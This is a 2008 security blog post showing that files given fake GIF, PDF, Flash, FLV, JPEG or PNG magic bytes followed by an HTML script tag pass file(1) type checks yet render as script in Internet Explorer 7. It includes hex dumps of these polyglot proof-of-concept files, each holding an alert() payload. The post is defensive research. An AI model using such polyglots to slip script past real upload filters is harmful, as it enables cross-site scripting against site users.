blafra
a place to spew

Content Ownership and Validating File Types

April 8th, 2008 by Blake Frantz

I was referred to Billy (BK) Rios’s blog as an article there somewhat relates to research I conducted on how browsers react when faced with different combinations of content-types, dispositions, and data. This is where I became aware of the term “Content Ownership” – the concept is familiar but the pretty term was not.

It’s pretty clear that taking ownership of other people’s content is risky business. Especially, given Internet Explorer’s willingness to render data as HTML despite the advertised Content-type. However, serving up other people’s content is often a requirement. Having that content look pretty is also a requirement. Flickr surely can’t send images with a Content-Disposition type of ‘attachment’ without killing their user experience. We are left with a need for additional validation. So how do we do that? File extensions surely don’t work. Nor will anything else that originates from the user and makes claims about the content format. What about file(1) and magic(4)?

For those unfamiliar, magic(4) contains a grammar that is used by file(1) to determine a file type based on the file’s content. For example:

blake@cecilia ~ $ file /bin/ls
/bin/ls: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), ...
blake@cecilia ~ $ file /etc/passwd
/etc/passwd: ASCII text


At first glance, this seems like a viable options. However, as some simple testing will show, those utilizing file(1) and magic(4) to perform content-type validation are in for a surprise. 

I was able to construct a GIF, PDF, Macromedia Flash (FLS), Macromedia Flash Video (FLV), and Compressed Macromedia Flash (CWS) files that satisfy file(1) yet render as HTML/JavaScript in Internet Explorer 7. It’s worth noting that I also attempted creating a simple JPEG and PNG in a similar manner but IE would not render them as HTML. I suspect this is due to the upper ASCII characters found within these files – more testing on that later. The implications of this are that if anyone is relying on file(1) or magic(3) for making content ownership decisions they may have a problems.

Below are the files I used for testing:

JPEG:
0000h: FF D8 FF E0 00 10 4A 46 49 46 3C 68 74 6D 6C 3E  ......JFIF<html>
0010h: 3C 73 63 72 69 70 74 3E 61 6C 65 72 74 28 29 3B  <script>alert();
0020h: 3C 2F 73 63 72 69 70 74 3E 3C 2F 68 74 6D 6C 3E  </script></html>
PDF:
0000h: 50 44 46 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  PDF<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
FWS:
0000h: 46 57 53 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  FWS<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
FLW:
0000h: 46 4C 56 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  FLV<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
CWS:
0000h: 43 57 53 3C 68 74 6D 6C 3E 3C 73 63 72 69 70 74  CWS<html><script
0010h: 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69 70  >alert();</scrip
0020h: 74 3E 3C 2F 68 74 6D 6C 3E                       t></html>
PNG:
0000h: 89 50 4E 47 0D 0A 1A 0A 3C 68 74 6D 6C 3E 3C 73  .PNG....<html><s
0010h: 63 72 69 70 74 3E 61 6C 65 72 74 28 29 3B 3C 2F  cript>alert();</
0020h: 73 63 72 69 70 74 3E 3C 2F 68 74 6D 6C 3E        script></html>
GIF: 
0000h: 47 49 46 38 3C 68 74 6D 6C 3E 3C 73 63 72 69 70  GIF8<html><scrip
0010h: 74 3E 61 6C 65 72 74 28 29 3B 3C 2F 73 63 72 69  t>alert();</scri
0020h: 70 74 3E 3C 2F 68 74 6D 6C 3E                    pt></html>


and the file(1) output for these files:

blake@cecilia ~ $ for i in `ls`; do file $i;done
compressed_flash.cws: Macromedia Flash data (compressed), version 60
flash.fla: Macromedia Flash data, version 60
flashvideo.fla: Macromedia Flash Video
gif.gif: GIF image data 28020 x 15980
jpeg.jpg: JPEG image data, JFIF standard 104.116, thumbnail 99x114
pdf.pdf: Macintosh PDF File (data) : F<html><script>alert();</script
png.png: PNG image data, 1668442480 x 1950245228, 101-bit


This brings up a bigger issue – the need for those writing browsers and those writing web platforms to agree on a standardized method for identifying content types. As we can see above, the differences in detection mechanisms will more than likely result in very real security implications.

Posted in security, web

Leave a Comment

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.